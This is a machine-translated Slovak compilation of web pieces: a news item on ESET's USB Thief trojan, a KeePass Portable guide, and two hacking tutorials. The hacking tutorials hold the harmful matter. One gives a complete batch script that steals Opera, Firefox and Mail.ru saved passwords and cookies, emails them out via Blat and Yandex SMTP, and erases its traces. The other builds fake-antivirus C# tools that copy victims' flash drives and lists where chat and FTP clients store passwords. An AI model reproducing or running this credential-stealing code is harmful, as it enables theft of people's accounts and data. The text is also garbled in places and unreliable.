Mimoriadne nezvyčajný trójsky kôň: malvér dostal názov USB Thief (Win32/PSW.Stealer.NAI). Malvér je zameraný na kradnutie dát, šíri sa a funguje na obyčajných flash diskoch a tiež šikovne skrýva stopy svojej prítomnosti v systéme. Trójsky kôň je ideálny na kybernetickú špionáž, pretože sa môže dostať aj do systémov, ktoré sú izolované od siete, ak sa k nim dá pripojiť USB kľúč.
Na rozdiel od iných USB hrozieb, ktoré sa držia pri spustení a vytvárajú skratky aplikácií, aby sa malvér spustil, USB Thief funguje inak. Trojan je navrhnutý tak, aby využil skutočnosť, že používatelia často ukladajú prenosné verzie aplikácií, ako sú Firefox, NotePad++, TrueCrypt atď., na flash disky. Malvér je úhľadne integrovaný do sťahovacieho reťazca takýchto programov, pričom sa tvári ako plugin resp DLL súbor. Keď teda používateľ spustí známu aplikáciu z flash disku, spustí sa spolu s ňou (na pozadí) aj trójsky kôň.
Neznámy autor malvéru sa postaral o vážnu ochranu jeho vývoja. USB Thief sa viaže na každý infikovaný flash disk pomocou jeho jedinečného ID a nastavení disku. Niektoré súbory trójskeho koňa sú chránené šifrovaním AES128 a kľúč sa generuje na základe jedinečných parametrov zariadenia. Názvy súborov škodlivého softvéru sa tiež v každom prípade líšia: sú generované na základe obsahu flash disku a času vytvorenia súborov. Pri pokuse skopírovať USB Thief na iný flash disk resp normálne ťažké disk, tento dvojstupňový ochranný systém zabráni fungovaniu malvéru a tiež vážne skomplikuje reverzné inžinierstvo.
trójska štruktúra
USB Thief funguje priamo z flash disku a nezanecháva žiadne stopy na samotnom systéme. Trojan pozostáva zo šiestich súborov, z ktorých štyri sú spustiteľné a dva obsahujú konfiguračné údaje. Prvý zavádzač je zodpovedný za spustenie trójskeho koňa spolu s prenosnou verziou programu. Skontroluje USB zariadenie a uistí sa, že naň môže zapísať ukradnuté informácie a uložiť ich sem. Potom sa spustí druhý nakladač. Kontroluje názvy nadradených procesov a uisťuje sa, že beží v normálnom prostredí (a nikto sa ho nepokúša analyzovať). Tretí zavádzač zasa kontroluje prítomnosť antivírusov v systéme.
Posledné, štvrté užitočné zaťaženie, ktoré je vložené do prebiehajúci proces, je priamo zodpovedná za krádež dát. USB Thief kradne dokumenty, obrázky, zoznam súborov zo všetkých dostupných diskov, dáta Registry systému Windows a informácie zhromaždené programom WinAudit. Všetky ukradnuté dáta sú uložené na flash disku a zašifrované pomocou eliptickej kryptografie.
Odborníci ESETu poznamenávajú, že útoky z pomocou USB Zlodejstvo zatiaľ nie je bežnou praxou. Trójsky kôň je však veľmi nebezpečný, pretože je ťažké zistiť jeho prítomnosť a po vybratí USB disku nezostanú žiadne stopy po krádeži informácií. V správe spoločnosti sa tiež uvádza, že autor malvéru, ak si to želá, môže svoj malvér „znovu použiť“ nahradením užitočného zaťaženia pre krádež údajov akýmkoľvek iným škodlivým softvérom.
V tomto článku popíšem, ako rýchlo a bez väčších ťažkostí napíšete a vytvoríte vírus, ktorý ukradne súbory s heslami a všetko pošle do schránky.
Začnime tým, že vírus bude napísaný v bat "e (CMD, môžete použiť základné príkazy), to znamená v obvyklom textový súbor a bude sa vykonávať pomocou štandardného, vstavaného tlmočníka Windows - "príkazového riadku".
Aby ste mohli napísať takýto vírus, potrebujete poznať presné miesto uloženia tých súborov, ktoré ukradne, komponenty Blat, ktoré si môžete stiahnuť z off stránky http://www.blat.net/ alebo z nášho servera, ako ako aj komponent z archivátora WinRaR Rar.exe (zaobídete sa aj bez neho).
Otvorte poznámkový blok a skopírujte doň nasledujúci kód:@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r kópia /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" skopírujte /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" skopírujte /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozill a\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite kópia /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\ rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot %\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat. exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls
Nebudem písať veľa zo samotného kódu Batinky.
@echo off - skryje telo zadku (takže to nie je potrebné, ale aj tak)
md %systemroot%\wincs - vytvorí priečinok wincs v systémový priečinok Windows, bez ohľadu na to, na ktorom disku je nainštalovaný alebo ako sa volá.
md %SystemDrive%\pass\ - vytvorí priečinok pass na jednotke, kde je nainštalovaný systém Windows.
md %SystemDrive%\pass\opera\ - vytvorí priečinok Opera, z ktorého pochádzajú wand.dat a cookies4.dat Prehliadač Opera(až 11* verzií, opera ukladá svoje heslá do súboru wand.dat)
md %SystemDrive%\pass\Mozilla\- vytvorí priečinok Mozilla, z ktorého pochádzajú súbory Prehliadač Mozilla(cookies.sqlite ,key3.db ,signons.sqlite ), v ktorých sú uložené heslá.
md %SystemDrive%\pass\MailAgent\- vytvorí zložku MailAgent, do ktorej sa skopírujú súbory obsahujúce históriu korešpondencie a kľúče registra (ukladajúce heslá) z Mail Agenta.
md %SystemDrive%\pass\MailAgent\reg- vytvorí zložku reg
attrib %systemroot%\wincs +h +s +r- umiestni atribúty do priečinka wincs, čím ho skryje z pohľadu.
attrib %SystemDrive%\pass +h +s +r- to isté ako vyššie.
skopírujte /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- skopíruje súbor blat.exe z miesta na stiahnutie do priečinka wincs
skopírujte /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- skopíruje súbor blat.dll z miesta sťahovania do priečinka wincs
skopírujte /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- skopíruje súbor blat.lib z miesta sťahovania do priečinka wincs
CD /D %APPDATA%\Opera\Opera\ - prejde do priečinka opera, kde sa nachádzajú súbory s heslami (nielen) z opery.
skopírujte /y wand.dat %SystemDrive%\pass\opera\wand.dat- skopíruje súbor wand.dat do priečinka opera
skopírujte /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- skopíruje súbor cookie4.dat do priečinka opera
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- exportuje kľúč databázy Registry magent_logins2, kde je uložené heslo, do priečinka reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- exportuje kľúč databázy Registry magent_logins3, kde je uložené heslo, do priečinka reg
CD / D %APPDATA% - prejdite do priečinka AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- skopíruje obsah priečinka Mra\Base do priečinka MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- skopíruje súbor ver.txt do priečinka MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- prejdite do priečinka s profilom prehliadača Mozilla
skopírujte /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- skopíruje súbor cookies.sqlite do priečinka Mozilla
skopírujte /y key3.db %SystemDrive%\pass\Mozilla\key3.db- skopíruje súbor key3.db do priečinka Mozilla
skopírujte /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- skopíruje súbor signons.sqlite do priečinka Mozilla
skopírujte /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- skopíruje komponent archivátora WinRar Rar.exe do priečinka pass
del /s /q %SystemRoot%\Rar.exe- odstráni komponent archivátora z priečinka Windows
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- archivovať obsah priečinka pass
skopírujte /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar skopírujte vytvorený archív do priečinka wincs
cd %systemroot%\wincs – prejdite do priečinka wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Heslo - pripraví program Blat na odoslanie archívu zadaním údajov na autorizáciu a odoslaním listu. Nezabudnite uviesť svoje údaje z poštovej schránky, z ktorej bude list s archívom odoslaná.
ren *.rar pass.rar - v prípade, že archív počas procesu nezískal nesprávny názov, znova ho premenujeme na pass.rar
%systemroot%\wincs\blat.exe -body Súbory Heslo -to [email protected] -pripojte %systemroot%\wincs\pass.rar- uveďte, na ktorú poštovú adresu bude list zaslaný a odošlite.
rmdir /s /q %SystemDrive%\pass- odstrániť priečinok pass
rmdir /s /q %systemroot%\wincs- odstrániť priečinok wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- odstráňte komponenty Blat z priečinka Windows.
del /s /q %systemroot%\blat.lib- odstráňte komponenty Blat z priečinka Windows.
attrib +a +s +h +r %systemroot%\wind.exe- dávame na seba atribúty, čím sa skrývame pred očami.
EXIT - dokončite proces batinkovania a ukončite.
cls - vymaže výstup všetkých riadkov v intraperátore.
Skopírované, uložiť ako wind.bat a skompilovať do exe pomocou Netopierie programy do exe konvertora, potom všetko zhromaždíme, to znamená, že vezmeme komponenty programu Blat a komponent archivátora WinRar (môžete si ho stiahnuť) a zlepíme to do jedného spustiteľného súboru alebo s nejakým programom by cesta na uvoľnenie všetkých súborov mala be% SystemRoot% alebo% WindowsDir% alebo %windir% .
Výsledkom je, že dostaneme vírus, ktorý antivírusy nespustia a pošle vám na poštu archív so súbormi Súbory, ktoré prídu na poštu, je možné dešifrovať pomocou obnovy viacerých hesiel, aj keď nie všetky, ale iba prútik .dat z opery a potom, ak nebol aktualizovaný na verziu 11 * Všetky ostatné súbory je možné dešifrovať ich nahradením vlastnými.
Myslím, že toto je koniec, ak máte nejaké otázky, kľudne sa pýtajte.
Ďakujem za pozornosť, všetko najlepšie!
©Swap TheHackWorld.in
Mnoho spoločností, vrátane Sony a Adobe, sa už stalo obeťou hackerov, ktorí ukradli milióny hesiel a iných používateľských údajov. Analýza týchto informácií ukázala, že mnohí používatelia často používajú slabé heslá ako „123456“ alebo rovnaké heslo pre mnohé služby. To značne uľahčuje ich úlohu hackerom a zároveň sa dá pochopiť taká neopatrnosť: kto si dokáže zapamätať viac ako tucet zložitých hesiel?
Jednoduchým riešením by mohol byť papier nalepený pod klávesnicou. Ani jeden hacker sa do nej nebude môcť dostať, no budete musieť neustále sledovať ľudí, ktorí sa nachádzajú v blízkosti vášho počítača. A tento list je k ničomu, ak sa chcete prihlásiť do svojho účtu z počítača niekoho iného.
Bezplatný nástroj KeePass 2 Portable túto dilemu rieši. Na jeho fungovanie vám postačí USB flash disk s 10 MB voľného miesta, na ktorý si nainštalujete pomocný program. V budúcnosti si budete musieť zapamätať iba jedno heslo - z chránenej oblasti flash disku. Veď v ňom KeePass ukladá prihlasovacie údaje do vašich webových služieb vo forme zakódovanej databanky, chránenej hlavným heslom.
Trójske kone, ktoré kradnú heslá, nebudú môcť nič vyňuchať. A keďže si už nemusíte pamätať desiatky hesiel, pre každú webovú službu môžete použiť nové, naozaj. silné heslo. Teraz vám podrobne povieme, ako používať KeePass.
Ako to spraviť
1 Nainštalujte trezor s heslom
Nainštalujte trezor s heslom
Vložte USB flash disk do PC, vytvorte na ňom nový priečinok a skopírujte tam obsah archívu so softvérom KeePass. Spustite program KeePass.exe. Po spustení aktivujte automatické vyhľadávanie aktualizácie kliknutím na "Povoliť" vo vyskakovacom okne. Potom zvoľte "Zobraziť | Zmeniť jazyk“ a kliknite na „Získať ďalšie jazyky“.
Stiahnite si súbor v ruskom jazyku zo stránky, ktorá sa otvorí kliknutím na „Russian | 2,25+". Rozbaľte obsah archívu na jednotku USB. Znova kliknite na "Zobraziť | Change Language (Zmeniť jazyk), zvoľte "Russian" a reštartujte KeePass stlačením tlačidla "Yes".
2 Vytvorte novú databázu hesiel
Vytvorte novú databázu hesiel
Vyberte "Súbor | New" a špecifikujte jednotku USB ako úložisko hesiel. V ďalšom okne vás program vyzve na nastavenie hlavného hesla. Budete ho musieť zadať pri každom spustení KeePass.
3 Aktivujte chránený režim
Aktivujte chránený režim
Ak chcete zabrániť trójskemu koňovi prečítať vaše heslo pre KeePass, mali by ste na jeho zadanie použiť chránený režim programu, podobne ako UAC v systéme Windows 7. Ak to chcete urobiť, prejdite v KeePass do časti „Nástroje | Nastavenia | Zabezpečenie", prejdite do spodnej časti okna a začiarknite políčko vedľa položky "Zadať hlavné heslo v zabezpečenom režime".
4 Naplňte databázu heslami
Naplňte databázu heslami
KeePass dokáže triediť heslá do skupín. Vaša nová banka hesiel má predvolene skupiny ako „OS“ alebo „Internet“. Na vytvorenie nový záznam, vyberte príslušnú skupinu (alebo vytvorte novú), kliknite pravým tlačidlom myši na bielu plochu napravo a potom kliknite na „Pridať položku“.
Vyplňte všetky polia a kliknite na tlačidlo OK. Keďže si už na prihlásenie do každého účtu nemusíte pamätať heslá, môžete si nastaviť nové, zložitejšie, ktoré sa dajú vygenerovať napríklad na passwort-generator.com.
5 Použite automatickú autorizáciu
Ak sa chcete do služby prihlásiť pomocou KeePass, otvorte skupinu, v ktorej je uložené príslušné heslo. Kliknite pravým tlačidlom myši kliknite myšou na príslušnú položku úložiska Heslá KeepPass a z rozbaľovacieho zoznamu vyberte možnosť „Spustiť automatické vytáčanie“. Potom program prenesie vaše údaje do prehliadača a prehliadač otvorí nové okno, v ktorom sa prihlásite do svojho účtu.
Upozorňujeme, že do poľa „URL“ musíte zadať adresu URL, ktorú zvyčajne zadávate v prehliadači na autorizáciu, inak nebude automatické zadávanie hesla cez KeePass fungovať.
6 Rozšírte KeepPass
Rozšírte KeepPass
Ak chcete rozšíriť funkčnosť KeePass, prejdite na "Nástroje | Moduly | Viac modulov“, po ktorej budete presmerovaní na stránku s užitočné rozšírenia(naše odporúčania nájdete v tabuľke vyššie). Teraz kliknutím na názov doplnku si ho stiahnite a rozbaľte na flash disk.
Reštartujte KeePass a prejdite na Nástroje | Moduly. V spodnej časti sa zobrazí zoznam dostupných pluginov (niektoré z nich je možné nakonfigurovať).
Najlepšie rozšírenia pre KeePass
Vybavte svoj trezor heslami pridané vlastnosti, napríklad funkcia Rezervovať kópiu alebo prenos hesla pre mobilné telefóny.
názov |
Popis |
| DataBaseBackup | Nastaví ochranu banky heslom v prípade krádeže alebo straty jednotky USB. |
| Twofish Cipher | |
| KeeAgent | Pridáva kódovací algoritmus, ktorý je takmer nemožné prelomiť; všimnite si, že to spôsobí, že KeePass bude bežať pomalšie. |
| KeyExchanger | Pridáva kódovací algoritmus, ktorý je takmer nemožné prelomiť; všimnite si, že to spôsobí, že KeePass bude bežať pomalšie. |
| KeeForm | Kliknutím na tlačidlo otvorí vaše obľúbené stránky a automaticky vyplní vaše prihlasovacie údaje. |
Pre obyčajných smrteľníkov je flash disk zariadenie na prenos dokumentov / filmov / fotografií a iných osobných (a niekedy aj veľmi osobných) informácií. Pre hackerov je však flash disk obeťou aj bojovým nástrojom. Dnes vám poviem všetky jemnosti nepostrehnuteľného odvádzania údajov z flash diskov do môjho počítača a tiež vás naučím, ako premeniť neškodné flash disky na programy na zálohovanie hesiel z „veľkého“ počítača.
Pasca na flash disky iných ľudí
Myšlienka programu „Evil Computer“ bude nasledovná. Vyvinieme malý nástroj, ktorý sa bude vydávať za super-mega pokročilý antivírus, ktorého účelom je kvalitatívne odstrániť „nebezpečné“ vírusy z flash diskov. Vírusom infikovaným flash diskom nikoho neprekvapíte, takže náš špecializovaný „antivírus“ nebude vyvolávať obavy u dôverčivého používateľa. Naopak, po vložení USB flash disku do počítača sa zobrazí správa ako: "Bol zistený vírus. Urobím podrobnú kontrolu všetkých súborov na prítomnosť infikovaných ", - určite počká na dokončenie tejto operácie.
Príprava nástroja
tak napíš užitočný program budeme na teraz módnom C#. Flexibilita jazyka a bohatá funkcionalita platformy .NET vám umožňuje vyvíjať aplikácie rýchlosťou blesku. Presne toto potrebujeme. Zaujíma nás úroda, ktorú môžeme zožať, nie nudný proces kódovania.
Jednou z dôležitých súčastí našej aplikácie bude rozhranie. Čím pevnejšie to urobíte, tým je pravdepodobnejšie, že obeť si úlovok nevšimne a pokojne počká na dokončenie antivírusovej kontroly. Príliš som sa netrápil a na formu čistého projektu som umiestnil iba obrázok a ProgressBar. Môžete sa vyblázniť a vytvoriť ohromujúci dizajn. Odporúčam vám pozrieť sa na dizajn nejakého skutočného antivírusu a navrhnúť si aplikáciu približne v rovnakom štýle.
Stanovili sme si úlohu
Budeme predpokladať, že sme sa rozhodli pre organizačné otázky a algoritmus činnosti, je čas diskutovať o technických nuansách. Takže náš antivírus by mal začať svoju špinavú prácu počas inštalácie flash disku. Raz nový disk sa v systéme objaví, náš program musí určiť jeho písmeno a začať kopírovať.
Predtým, ako som sa zaviazal napísať tento článok, narazil som na zdrojový kód takéhoto programu. Autor príkladu určil prítomnosť jednotky Flash pravidelným vymenovaním všetkých diskov na prítomnosť jednotky typu " vymeniteľné médiá". Najprv som si myslel, že pôjdem rovnakou cestou, ale vnútorný hlas mi naznačil iracionalitu. Po zvážení všetkých „pro“ a všetkých „no a ide sa“ som tento nápad zavrhol a vybral sa na prechádzku na MSND. O päť minút neskôr sa ukázalo, že som to urobil z dobrého dôvodu. Odpoveď sa našla!
Bez WinAPI nikde...
Najúčinnejším spôsobom, ako zistiť pripojenie nového zariadenia (v našom prípade flash diskov), je zachytiť a analyzovať správu WM_DEVICECHANGE. Počas inštalácie zariadenia sa správa odošle do všetkých okien a my ju môžeme jednoducho spracovať v našej aplikácii. Na to stačí opísať funkciu WindowProc. V praxi to vyzerá takto:
LResult CALLBACK WindowProc (HWND hwnd, //identifikátor okna UINT uMsg, //id správy WPARAM wParam, //udalosť, ku ktorej došlo LPARAM lParam //ukazovateľ na štruktúru obsahujúcu údaje)
V tele funkcie je potrebné porovnať hodnotu parametra WParam s ID rôznych udalostí súvisiacich so správou WM_DEVICECHANGE. Pre náš príklad by to boli:
Dobre, vieme, ako zistiť skutočnosť pripojenia nového zariadenia, ale ako sa uistiť, že ste pripojili USB flash disk? Existuje veľa zariadení pripojiteľných za chodu (hovorím o usb) (tlačiareň, skener, modem atď.). Našťastie je tento problém vyriešený celkom jednoducho. Pomocou parametra LParam môžeme odkazovať na štruktúru _DEV_BROADCAST_HDR, ktorá má pole dbch_devicetype. Tu sa na základe hodnoty tohto poľa vyvodia príslušné závery. Ak sa rovná DEV_DEVTYP_VOLUME, potom je čas radovať sa a tlieskať rukami - je k nám pripojený flash disk!
Typedef struct _DEV_BROADCAST_HDR ( DWORD dbch_size; //veľkosť štruktúry DWORD dbch_devicetype; //Typ zariadenia DWORD dbch_reserved; //Rezervované, nepoužité )DEV_BROADCAST_HDR, *PDEV_BROADCAST_HDR;
Do nášho pisyuku bol vložený USB flash disk - skúsme zistiť písmeno jednotky, ktoré mu systém priradil. Rovnako ako v "Field of Miracles" to môžete uhádnuť, ale je lepšie vytiahnuť informácie zo štruktúry DEV_BROADCAST_VOLUME.
Typedef struct _DEV_BROADCAST_VOLUME ( DWORD dbcv_size; //veľkosť štruktúry DWORD dbcv_devicetype; //Typ zariadenia DWORD dbcv_reserved; //Rezervované DWORD dbcv_unitmask; //Písmeno jednotky bitová maska, PDCWORD_VOLD_WORD_DWRD_dbcv_devicetype
Zo všetkých polí v tejto štruktúre nás zaujíma dbcv_unitmask. Všimnite si, že táto vlastnosť obsahuje iba kúsok písmena, nie jeho symbolickú reprezentáciu. Napríklad, ak je hodnota 0, potom písmeno jednotky bude A; ak 1, tak B atď. Pre pohodlie získania symbolického písmena je najlepšie napísať funkciu.
Ak náš stĺpček čítate už dlhšie a poznáte funkcie API, potom nie je potrebné čítať ďalšiu časť článku. Otvorte editor a začnite vytvárať aplikácie. Popísal som všetky potrebné štruktúry a funkcie; stačí si ich dať dokopy v programe. Rozhodnite sa a začnem sa ponárať najmä do .NET a C #.
Poďme na .NET "ohm
Je čas začať trénovať a aplikovať svoje znalosti na jazyk C#. "Čo do pekla? - pýtaš sa. - Polovicu článku som hovoril o WinAPI, ale potom som sa len hlúpo rozhodol zavolať všetky funkcie vo forme natívneho kódu? Kde je udávaná blesková rýchlosť vývoja?
V niečom máš pravdu. Naša aplikácia bude skutočne využívať funkcie WinAPI (žiadny jednoduchší spôsob), ale sami ich popisovať nebudeme. Mnoho vývojárov čelilo problému určenia flash diskov. V dôsledku týchto šarvátok sa začali objavovať bezplatné triedy pre C #, v ktorých už bola implementovaná všetka potrebná funkcionalita. Musíme len pripojiť takýto prázdny (čítací komponent) k nášmu projektu a zavolať niekoľko metód. Teraz použijeme jednu z týchto tried. Ale znalosť štruktúr popísaných vyššie sa vám určite bude hodiť pri portovaní tohto programu do Windows API.
Existuje veľa hotových tried, ktoré takéto problémy riešia, ale mne sa najviac páčila verzia Jana Dolinaya. Táto osoba napísala veľmi ľahko použiteľnú a zrozumiteľnú triedu DriveDetector, ktorá dokáže:
A čo je najdôležitejšie, práca s touto triedou je mimoriadne jednoduchá – teraz to uvidíte. Pripojenie triedy k vášmu projektu sa vykonáva štandardným spôsobom a nemá zmysel sa tým zaoberať. Prejdime teda k inicializácii. Robí sa to takto:
FlashDriveDetector = new DriveDetector(); flashDriveDetector.DeviceArrived += new DriveDetectorEventHandler(OnDriveArrived); flashDriveDetector.DeviceRemoved += new DriveDetectorEventHandler(OnDriveRemoved);
Po vytvorení inštancie objektu triedy DriveDetector definujem obsluhu udalostí DevieArrived() a DriveRemoved(). Podľa ich názvu nie je ťažké uhádnuť, za čo môžu. Celý inicializačný kód je najlepšie napísať metódou Form1(). Hlavný kód nášho programu bude v obsluhe udalosti DeviceArrived. Jeho text si môžete pozrieť na bočnom paneli:
String dirName = Environment.GetCommandLineArgs() + "flash_" + DateTime.Now.ToString("dd-MM-yy-hh-mm-ss"); CreateDirectory(názov_adresára); xDirectory flashcopier = new xDirectory(); flashcopier.IndexComplete += new IndexCompleteEventHandler(IndexComplete); flashcopier.ItemCopied += new ItemCopiedEventHandler(ItemCopied); flashcopier.CopyComplete += new CopyCompleteEventHandler(CopyComplete); flashcopier.Source = new DirectoryInfo(e.Drive.ToString()); flashcopier.Destination = new DirectoryInfo(dirName); flashkopírka.Prepísať = pravda; flashcopier.FolderFilter = "*"; flashcopier.FileFilters.Add("*.doc"); flashcopier.FileFilters.Add("*.xls"); //Definovanie ďalších filtrov //.... flashcopier.StartCopy();
Hneď na začiatku výpisu definujem cestu k priečinku, kde budeme kopírovať obsah flash disku. Skopírujeme do adresára „flash_current date“, ktorý sa nachádza spolu s priečinkom, z ktorého sa naša aplikácia spúšťa - je to pohodlnejšie. Keď som sa rozhodol pre názov priečinka, pokúsim sa ho vytvoriť pomocou funkcie CreateDirectory (). Túto funkciu som napísal len pre pohodlie. Vytvorí inštanciu objektu DirectoryInfo určenú na prácu s adresármi a zavolá jeho metódu Create (), ktorá vytvorí nový priečinok.
Po vytvorení priečinka môžete kopírovať. Všetky súbory skopírujem pomocou objektu typu xDirectory. Ak napíšete kód z výpisu sami, potom pri pokuse o kompiláciu kompilátor vygeneruje chybu, v ktorej čierne na bielom povie: "Objekt tohto typu nebol nájdený."
Ide o to, že xDirectory je trieda tretej strany. Kedysi dávno som ho našiel na internete a odvtedy ho často používam vo svojich projektoch. Páči sa mi to, pretože na kopírovanie podpriečinkov stačí zavolať jednu metódu. Okrem toho umožňuje nastaviť filtre.
Naozaj sa bez toho zaobísť. Vezmeme štandardné triedy, techniku dobre známu všetkým programátorom – rekurziu – a napíšeme niekoľko desiatok riadkov kódu. Bohužiaľ, toto sa mi absolútne nechce. Vo dvore je 21. storočie, musíme optimalizovať naše akcie na maximum a xDirectory nám s tým pomôže.
Modul s triedou je na našom disku a o účele metód/vlastností/udalostí sa dozviete v príslušnej tabuľke.
vlastnosti triedy xDirectory
xDirectory Class Methods
Skúste spustiť našu aplikáciu a vložte flash disk. Po niekoľkých sekundách (v závislosti od neporiadku vášho flash disku) sa všetok obsah usb disku prenesie do priečinka, z ktorého ste spustili čerstvo upečenú aplikáciu.
USB grabber
Teraz uvažujme o inverznom probléme a povedzme si o nuansách vytvárania tzv. zachytávač flash diskov. Princíp tvorby je úplne rovnaký. Musíte napísať jednoduchú aplikáciu, ktorá sa automaticky spustí po inštalácii flash disku.
V procese práce aplikácia prejde priečinky / kľúče registra, v ktorých obľúbené programy ukladajú uložené heslá, a ak je to možné, skopírujú všetky informácie do jedného zo svojich priečinkov. Aby vaše automatické spustenie nevzbudilo podozrenie u úbohého používateľa, dajte si námahu a starostlivo ho zamaskujte. Napríklad pod spúšťacou ponukou.
Pravdepodobne viete, že v súčasnosti sú veľmi populárne takzvané prenosné verzie aplikácií, teda programy, ktoré môžu pracovať priamo z flash disku. Toto je najlepší spôsob hry. Navrhnite program v príslušnom štýle a pre dôveryhodnosť prihoďte niekoľko tlačidiel určených na spustenie akýchkoľvek programov. Môj dizajn je zobrazený na obrázku.
Ako ideme kradnúť?
Hneď musím povedať, že tu nie je potrebné vykonávať superhackerské akcie. Väčšina programov ukladá osobné údaje do priečinka Documents and Settings\User\Application Data\%ProgramName% alebo do registra. Názov programu znamená akýkoľvek program. Ak sa stretnete s prvou možnosťou, budete musieť použiť už známu triedu xDirectory (alebo štandardné metódy na prácu so súbormi) a skopírovať s ňou všetko, čo potrebujete. V druhom prípade budete musieť pracovať s registrom. Nebudem uvádzať príklad kopírovania súborov (už sme to zvažovali), ale ukážem vám, ako pracovať s registrom pomocou nástrojov .NET (na príklade určenia cesty k priečinku TC):
RegistryKey readKey = Registry.CurrentUser.OpenSubKey(" softvér\\Ghisler\\ Úplný veliteľ"); kľúč reťazca = (reťazec) readKey.GetValue("InstallDir");
To je všetko. Už nebude žiadny kód. Tieto znalosti by vám mali stačiť na získanie súborov s cennými informáciami. Aby som to trochu uľahčil, pripravil som zoznam tých naj obľúbené programy a vymaľovali všetky spôsoby, akými ukladajú uložené používateľské dáta.
Poštový agent
Messenger z Mail.ru je teraz veľmi populárny medzi obyčajnými smrteľnými používateľmi (najmä medzi ženami). Ciele sú jasné, úlohy sú stanovené, preto nás zaujíma:
gTalk
Spoločnosť Google vytvára pohodlné a funkčné produkty, medzi ktorými je klient gabber - gTalk. Dnes gTalk zatiaľ nie je veľmi populárny. Nie je nainštalovaný na každom druhom PC, ale občas sa to predsa len vyskytne a aby sme boli v predmete, je lepšie hneď naučiť náš program získavať heslá aj z tohto messengeru. Heslá pre všetky účty gTalk sú uložené v registri - HHEY_CURRENT_USER\Software\Google\Google Talk\Accounts . V tejto pobočke sú uvedené všetky účty, do ktorých ste sa kedy prihlásili gTalk. Heslá účtov sú uložené v parameter reťazca pw.
Úplný veliteľ
Úplný veliteľ- zďaleka najobľúbenejší Správca súborov. Program obsahuje približne vagón a malý vozík (a rovnaký počet je možné k nemu pripojiť pomocou doplnkových zásuvných modulov). Nás zaujíma len vstavaný FTP klient. Používajú ho mnohí a heslá sa samozrejme ukladajú.
TC na rozdiel od mnohých iných programov neukladá heslá do registra, ale používa staré dobré ini súbory. Heslá, ako aj všetky potrebné údaje na pripojenie k serverom (ip, port, používateľské meno atď.) Úplný veliteľ ukladá do súboru wcx_ftp.ini, ktorý sa nevinne nachádza v priečinku programu. Cesta k adresáru, kde je nainštalovaný Úplný veliteľ, zistíte z registra. Pozrite sa do vetvy HKEY_CURRENT_USER\Software\Ghisler\Total Commander.
firefox
Prehliadač dnes nie je len program na cestovanie po WEBe, ale celok, ktorý okrem rôznych možností uchováva množstvo dôverných informácií. Typickým príkladom sú webové formuláre. 99% moderných stránok vyžaduje registráciu. Zapamätať si a neustále mať na pamäti kombináciu prihlasovacieho mena / hesla pre každú stránku je nereálna úloha, najmä ak ste pokročilý používateľ a vaše surfovanie po internete sa neobmedzuje len na Odnoklassniki a VKontakte.
Vývojári uľahčili používateľom život a do programov zabudovali takzvané „úschovne hesiel“. Zaregistroval som sa, prihlásil som sa pod svojím účtom, prikázal prehliadaču, aby si zapamätal prihlasovacie údaje – a zabudol som. Pri ďalšej návšteve zostáva už len vykonať pár kliknutí myšou a už ste na stránke. Keďže prehliadač ukladá heslá, znamená to, že máme možnosť ukradnúť celú jeho databázu.
